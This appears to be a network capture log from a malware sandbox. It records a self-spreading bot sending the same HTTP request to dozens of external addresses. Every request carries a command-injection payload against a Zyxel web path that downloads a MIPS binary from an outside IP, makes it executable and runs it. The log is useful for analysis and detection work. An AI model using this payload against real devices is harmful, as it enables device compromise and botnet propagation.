                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221157074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6512192.168.2.1355980172.167.171.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221206903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6513192.168.2.1360428193.119.222.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221225023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6514192.168.2.1357606169.32.196.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221261978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6515192.168.2.1359704149.176.221.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221297979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6516192.168.2.1333930153.94.21.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221335888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6517192.168.2.134086832.69.207.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221383095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6518192.168.2.134471677.255.85.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221427917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6519192.168.2.1359420154.14.31.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221460104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6520192.168.2.135074032.146.253.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221498013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6521192.168.2.134324852.68.41.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221558094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6522192.168.2.1350714146.86.12.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221585989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6523192.168.2.1342626178.128.242.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221615076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6524192.168.2.1360334201.157.102.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221649885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6525192.168.2.1344420194.208.129.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221721888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6526192.168.2.1350866195.90.148.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221755981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6527192.168.2.134986466.64.248.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221788883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6528192.168.2.135106036.142.113.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221823931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6529192.168.2.135734846.53.120.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221863031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6530192.168.2.1338426161.6.242.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221903086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6531192.168.2.135788477.8.50.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221936941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6532192.168.2.133716842.253.129.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.221982956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6533192.168.2.135910674.78.136.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222058058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6534192.168.2.135775212.80.3.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222094059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6535192.168.2.134506668.180.203.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222142935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6536192.168.2.135972459.96.141.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222174883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6537192.168.2.134429071.250.107.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222218990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6538192.168.2.1358100166.16.23.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222284079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6539192.168.2.135256090.22.117.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222343922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6540192.168.2.1334308174.51.126.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222353935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6541192.168.2.133407427.181.74.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222353935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6542192.168.2.1341310213.177.164.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222398043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6543192.168.2.135592423.143.16.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222428083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6544192.168.2.1333840174.123.158.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222481966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6545192.168.2.1333776213.109.51.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222503901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6546192.168.2.1357900202.191.156.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222548962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6547192.168.2.13463722.208.241.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222590923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6548192.168.2.1339448162.211.2.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222630024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6549192.168.2.13341904.45.23.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222671032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6550192.168.2.1360522140.182.254.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222726107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6551192.168.2.1341244109.12.18.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222758055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6552192.168.2.1349390100.149.240.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222851992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6553192.168.2.1346002216.165.4.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222910881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6554192.168.2.133488862.221.126.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222923994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6555192.168.2.133968460.30.181.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.222974062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6556192.168.2.1339258189.82.94.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223026037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6557192.168.2.1333154209.154.34.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223077059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6558192.168.2.1337424222.236.205.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223114014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6559192.168.2.1348498122.42.53.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223138094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6560192.168.2.134530840.78.69.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223166943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6561192.168.2.1339410218.67.56.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223231077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6562192.168.2.1344554149.45.44.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223239899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6563192.168.2.13379241.239.92.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223298073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6564192.168.2.1357506105.75.90.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223325968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6565192.168.2.135163673.117.95.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223371983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6566192.168.2.1352594178.28.233.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223397970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6567192.168.2.1342394182.80.159.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223432064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6568192.168.2.1338564195.73.84.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223476887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6569192.168.2.13414368.141.123.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223511934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6570192.168.2.1353108113.162.42.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223560095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6571192.168.2.135626291.222.112.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223591089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6572192.168.2.134643891.57.106.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223653078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6573192.168.2.1336070155.183.220.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223684072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6574192.168.2.1347218211.30.215.120443
                                                  TimestampBytes transferredDirectionData
